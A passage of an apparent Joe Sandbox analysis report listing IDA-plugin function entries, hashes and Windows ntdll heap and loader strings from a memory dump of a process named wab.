                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                            • API String ID: 0-1168191160
                                            • Opcode ID: 2ccc77e10918e04be28dab343859e50115c9644584d335cca80d7497b80d4ce2
                                            • Instruction ID: 173db87caaa2704ec6325b68c3bb37ae4df5bafec6323f4f61503be934034e51
                                            • Opcode Fuzzy Hash: 2ccc77e10918e04be28dab343859e50115c9644584d335cca80d7497b80d4ce2
                                            • Instruction Fuzzy Hash: D4F160B9A052288BCB21DF18CC90B99B3B9EF44720F1480D9EA09A7341E775DF85CF59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 232F1648
                                            • HEAP[%wZ]: , xrefs: 232F1632
                                            • HEAP: , xrefs: 232F14B6
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            • Opcode ID: 9d47ee391ede57481820edc31675352793c83703f7656386bff54540652b1e3a
                                            • Instruction ID: d671a7b4bfd343490642f165970c05faf2cbadcb002f7563a970b5073b9d882c
                                            • Opcode Fuzzy Hash: 9d47ee391ede57481820edc31675352793c83703f7656386bff54540652b1e3a
                                            • Instruction Fuzzy Hash: FBE1E230A046569FD719CF68C891B7AFBE5EF48300F5888DDE596CB246D734EA82CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                            • API String ID: 0-2391371766
                                            • Opcode ID: 954505567ec0aa079751af46c317ca5874f02e896f52b1acc073b730ad53c967
                                            • Instruction ID: a43b6fcc83eea4de6b3b3f3014dff568554ebb42cd45768882a81b368f8039c7
                                            • Opcode Fuzzy Hash: 954505567ec0aa079751af46c317ca5874f02e896f52b1acc073b730ad53c967
                                            • Instruction Fuzzy Hash: 64B1AD72654345AFE322DF50CC80B5BB7FCAB44720F0449A9FA509B281D778EA448BD6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: FilterFullPath$UseFilter$\??\
                                            • API String ID: 0-2779062949
                                            • Opcode ID: 34a064a83b1b6c5cdf86775c41493dc5522a20333ac1b9a4f4119b3416973821
                                            • Instruction ID: 35337aee363b8b0a75949cdf116a5408614796e19311fdf83e27245cdc122f3f
                                            • Opcode Fuzzy Hash: 34a064a83b1b6c5cdf86775c41493dc5522a20333ac1b9a4f4119b3416973821
                                            • Instruction Fuzzy Hash: 83A16A75D11229ABDB319F64CC88B9AB7B8EF05710F1041EAEA09A7250DB359FC4CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • TargetNtPath, xrefs: 233CB3AF
                                            • GlobalizationUserSettings, xrefs: 233CB3B4
                                            • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 233CB3AA
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                            • API String ID: 0-505981995
                                            • Opcode ID: 5faa6f962ababc35f90d2ccebbb7fc1e13ae90da0cc98613cc6cdbea1f53a263
                                            • Instruction ID: d2bc642dd805533a680ecea46177dd358ba5dd1fe98a0222a3f95115ed73bfc7
                                            • Opcode Fuzzy Hash: 5faa6f962ababc35f90d2ccebbb7fc1e13ae90da0cc98613cc6cdbea1f53a263
                                            • Instruction Fuzzy Hash: F5615A72D41269ABDB31DF54CC98BDAB7B8AB14710F0105E9AA08AB251CB74DF84CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                            • API String ID: 0-2283098728
                                            • Opcode ID: 4622cc81999b35bf2269b29f6260ce6a2bd205d4ee1b35e67bdd20478ac8210b
                                            • Instruction ID: 76683913dd0ed4bba8b6b0c6c9ebf61deb68d816ef3f437601ccc1dd7a2776eb
                                            • Opcode Fuzzy Hash: 4622cc81999b35bf2269b29f6260ce6a2bd205d4ee1b35e67bdd20478ac8210b
                                            • Instruction Fuzzy Hash: 5151D231A003019FD729EF38CC84A1977B9BF98310F0806EDE5969B286D770AB64CBD1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 2334E455
                                            • HEAP[%wZ]: , xrefs: 2334E435
                                            • HEAP: , xrefs: 2334E442
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                            • API String ID: 0-1340214556
                                            • Opcode ID: 8c4a96bfe86276e14c5ccf032f14fabb94e2c8002eb66c4523c0a2102bca7e62
                                            • Instruction ID: bbe0eb49ba0247868450f23c7b8b624dca8832b6bd4531ad9be938a141c748e6
                                            • Opcode Fuzzy Hash: 8c4a96bfe86276e14c5ccf032f14fabb94e2c8002eb66c4523c0a2102bca7e62
                                            • Instruction Fuzzy Hash: 5551E131A04784AFD312DBA8CC85F5ABBF8EF04704F0941E5E6558B692D374FA90CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • LdrpCompleteMapModule, xrefs: 2335A39D
                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 2335A396
                                            • minkernel\ntdll\ldrmap.c, xrefs: 2335A3A7
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                            • API String ID: 0-1676968949
                                            • Opcode ID: 65794a5f4513cce46beadb48dc6cd350b91d9c6dcd05c17fd3a45c49c6cf8f68
                                            • Instruction ID: 5f872c14ffa4595ee42a9d5ae312bb3e4d17646b2a4d4c32c2407f2073e935c2
                                            • Opcode Fuzzy Hash: 65794a5f4513cce46beadb48dc6cd350b91d9c6dcd05c17fd3a45c49c6cf8f68
                                            • Instruction Fuzzy Hash: EE513F31E007459BD726DB68CD40F4AB7E8AB08724F1802E4FA928B7D6D770EB41CB44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • Heap block at %p modified at %p past requested size of %Ix, xrefs: 2339D7B2
                                            • HEAP[%wZ]: , xrefs: 2339D792
                                            • HEAP: , xrefs: 2339D79F
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                            • API String ID: 0-3815128232
                                            • Opcode ID: b260113ead5eee05ebe556b04a859e79d6d5998654858b5bd815410f5cec7522
                                            • Instruction ID: 309b46e78f6b13cb47443694ba87c83d039b4e2d896d0dea1bd884358e2afb54
                                            • Opcode Fuzzy Hash: b260113ead5eee05ebe556b04a859e79d6d5998654858b5bd815410f5cec7522
                                            • Instruction Fuzzy Hash: 3651E035100250CEF360EF29CC42B72B3E9DB55284F9548CBF5DA8B685D23AFA42DB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • Failed to reallocate the system dirs string !, xrefs: 233680E2
                                            • minkernel\ntdll\ldrinit.c, xrefs: 233680F3
                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 233680E9
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1783798831
                                            • Opcode ID: fb62b35b4460f0fbd035af02c82a0fc1eec03ea005993daa9b054801b20d42b2
                                            • Instruction ID: f74cbb397d9329429a1abdac174b73e49d8bfda506bb1dedb585d70c864b2f0e
                                            • Opcode Fuzzy Hash: fb62b35b4460f0fbd035af02c82a0fc1eec03ea005993daa9b054801b20d42b2
                                            • Instruction Fuzzy Hash: 4741C171914704AFC731EB24CC44B4B7BECAF64750F0449AAF958D7252EB78DB008B95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                            • API String ID: 0-1151232445
                                            • Opcode ID: 9a8275387db03340e74e3cda067a9bc506f87160b72e978aaca877fe9e4e2acb
                                            • Instruction ID: 34bf9bb649ba7fdfa24367512d2619cafca25408ddf37c46d5bbebf907e747d0
                                            • Opcode Fuzzy Hash: 9a8275387db03340e74e3cda067a9bc506f87160b72e978aaca877fe9e4e2acb
                                            • Instruction Fuzzy Hash: B5413734A002818FDB25DF1CCCE1B6577E49F02208F6844E9D79D8B656CA75F6C5DB21
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 23361943
                                            • minkernel\ntdll\ldrtls.c, xrefs: 23361954
                                            • LdrpAllocateTls, xrefs: 2336194A
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                            • API String ID: 0-4274184382
                                            • Opcode ID: ab2f14b31bf8caed6052a2c461359a1e728d9043586bebd2db4fc4ae49d8d537
                                            • Instruction ID: 13b107ec80594519cd32a0ed1709bf1673a95b2c388277e81333eabfa5cf6abf
                                            • Opcode Fuzzy Hash: ab2f14b31bf8caed6052a2c461359a1e728d9043586bebd2db4fc4ae49d8d537
                                            • Instruction Fuzzy Hash: 3E419876E00604AFDB25CFA8CD80AAEBBF5FF58300F148199E516A7241DB34EA41CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 23374508
                                            • LdrpCheckRedirection, xrefs: 2337450F
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 23374519
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-3154609507
                                            • Opcode ID: bc4664bbe00b5251f72b08e5641941f07010b423bb54a677ee454f0da69f50ce
                                            • Instruction ID: 16e988c07fd98b6c5b4f8dd6fb91438ab5ac71d055b60bc9e94a7bf6f6395436
                                            • Opcode Fuzzy Hash: bc4664bbe00b5251f72b08e5641941f07010b423bb54a677ee454f0da69f50ce
                                            • Instruction Fuzzy Hash: 9C41A032F052119FCB21DE588844A16B7F8AF48670F0A46D9ED58E7256D738FA80DB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • @S,#, xrefs: 232FA268
                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 232FA229
                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 232FA21B
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @S,#$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                            • API String ID: 0-1989334896
                                            • Opcode ID: e4d3dda9af6089fd3b8eee546bb1692c8abee26b7dd72090559c6649d3fedd0d
                                            • Instruction ID: 1cff16c6948c5299967c6ccc5d1a4253dae8b87602bc98d4e585064a523217cd
                                            • Opcode Fuzzy Hash: e4d3dda9af6089fd3b8eee546bb1692c8abee26b7dd72090559c6649d3fedd0d
                                            • Instruction Fuzzy Hash: 73418830B106459BCB11DFA9CC80F5AB7B8BF49710F1840E5E904EB3A1E336DA90CB15
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • GlobalFlag, xrefs: 2337B30F
                                            • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 2337B2B2
                                            • @, xrefs: 2337B2F0
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                            • API String ID: 0-4192008846
                                            • Opcode ID: 46c8c2e356667a3f499f07140d85abcb2d95b2c77b0db9ba9fa11d17070f6333
                                            • Instruction ID: 2540d2a675503de5295234dd960eda7d782a3769ab98fc1b23f3648582e3ab30
                                            • Opcode Fuzzy Hash: 46c8c2e356667a3f499f07140d85abcb2d95b2c77b0db9ba9fa11d17070f6333
                                            • Instruction Fuzzy Hash: 22313B71E0120DAFEB10EF94CC80AEEBBBCEB44744F4444A9E615E7241D7B89B448B94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • DLL "%wZ" has TLS information at %p, xrefs: 2336184A
                                            • minkernel\ntdll\ldrtls.c, xrefs: 2336185B
                                            • LdrpInitializeTls, xrefs: 23361851
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                            • API String ID: 0-931879808
                                            • Opcode ID: 76bcf4d94465b0cd4d4a742a1062be14892f208da26167735f2f79d99978ce81
                                            • Instruction ID: e15670e0dd4abedb2fb419d2bdfa93f28532b7a0737a4244aaedb98745aec474
                                            • Opcode Fuzzy Hash: 76bcf4d94465b0cd4d4a742a1062be14892f208da26167735f2f79d99978ce81
                                            • Instruction Fuzzy Hash: AE31F472E10614AFE7219F94CE85F9A7AACEF54354F1100D9E506A7380D7B4EF468790
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@
                                            • API String ID: 0-149943524
                                            • Opcode ID: 28dcb03de47d79e8e136cb35cb582a388118ceebfeb258ddb3a12a7656d92001
                                            • Instruction ID: a26c6a9d4f4342942c737562cdfe4e65af3e1e9ecc2db04ee3cac4bca5ec0869
                                            • Opcode Fuzzy Hash: 28dcb03de47d79e8e136cb35cb582a388118ceebfeb258ddb3a12a7656d92001
                                            • Instruction Fuzzy Hash: C632C0726083118BE724DF14C890B2EB7F5EF89744F1449AEFA9687290E734DA44CB96
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Legacy$UEFI
                                            • API String ID: 2994545307-634100481
                                            • Opcode ID: 2b76017a4b99e7cc47742fad7d1e421756d6e7f628bc473d9745f1869d6f1070
                                            • Instruction ID: 4b5eb42ed25690301b4788c675466b5310496ece15ee384d23f700c2c9e09eaf
                                            • Opcode Fuzzy Hash: 2b76017a4b99e7cc47742fad7d1e421756d6e7f628bc473d9745f1869d6f1070
                                            • Instruction Fuzzy Hash: 96616F71E003189FDB25CFA8C950AADB7F8FB44B00F1480A9E659EB255E730DA44CF58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • RedirectedKey, xrefs: 233CB60E
                                            • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 233CB5C4
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                            • API String ID: 0-1388552009
                                            • Opcode ID: 70573400a650962d703c739d06b859a832c3e7a2f2b90c2c0d4f84896e3a4553
                                            • Instruction ID: 2049e6304f8d4cb65e96641cc4dcdd58dd17473b2c95f00165c6b350b37c8fcb
                                            • Opcode Fuzzy Hash: 70573400a650962d703c739d06b859a832c3e7a2f2b90c2c0d4f84896e3a4553
                                            • Instruction Fuzzy Hash: 8061E2B5C01259EFDF11DF94C888ADEBBB8FF48710F1084AAF905A7240D7349A45CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$$
                                            • API String ID: 0-233714265
                                            • Opcode ID: e0f832dc081f77dc8b9812248c342f1d4f0edc587057aacc3114acb7a20ee133
                                            • Instruction ID: bf1e7255e14f8036b53bba5032645c6bb0ec2d47d12ce2c46d48f10d4bd85dbb
                                            • Opcode Fuzzy Hash: e0f832dc081f77dc8b9812248c342f1d4f0edc587057aacc3114acb7a20ee133
                                            • Instruction Fuzzy Hash: 2B61DD72E0074ACFDB21DFA4C980B9DB7F5BF44704F1444A9E215AB691CB74AB80CB80
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                            • API String ID: 0-118005554
                                            • Opcode ID: 645d0457472455decb0b80a10c83b6237288e80c461b2d08eb2bacf6dc349687
                                            • Instruction ID: 7137fae05c394a177f0df13aa29fcf1a8f0f2f47080018a8335167b034493ea1
                                            • Opcode Fuzzy Hash: 645d0457472455decb0b80a10c83b6237288e80c461b2d08eb2bacf6dc349687
                                            • Instruction Fuzzy Hash: 5C31E2352097819BD311EF68DC40B1AB7E8EF85B60F0408E9F955CB390EB35DA05CB96
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .#$ .#
                                            • API String ID: 0-3147244736
                                            • Opcode ID: 9936913390df7c5b7e2689b9fdaf6f6af892de533715c5913d3e926eda9ccce9
                                            • Instruction ID: ca94001e60ed19b757a31664936683fe1c6971c82106fc5b0a2311753795f8ad
                                            • Opcode Fuzzy Hash: 9936913390df7c5b7e2689b9fdaf6f6af892de533715c5913d3e926eda9ccce9
                                            • Instruction Fuzzy Hash: F0310836A057059BC721DF548C90D5BF7E5AFA8650F0585E9FD1597310EA30ED408FA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .Local\$@
                                            • API String ID: 0-380025441
                                            • Opcode ID: 888097be3f129399831d3a24ddbdd6bb0fa5b5ad713fc3e912bec43cf2da971c
                                            • Instruction ID: 2951c9f2e8eeaea03db4b820355b7545acfb663de6e55025b39d87d16322c5f4
                                            • Opcode Fuzzy Hash: 888097be3f129399831d3a24ddbdd6bb0fa5b5ad713fc3e912bec43cf2da971c
                                            • Instruction Fuzzy Hash: 70315E72549705AFD321DF28C980A5BBFECFB95664F0409AEF99583250D634DF048BE2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 2336289F
                                            • RtlpInitializeAssemblyStorageMap, xrefs: 2336289A
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
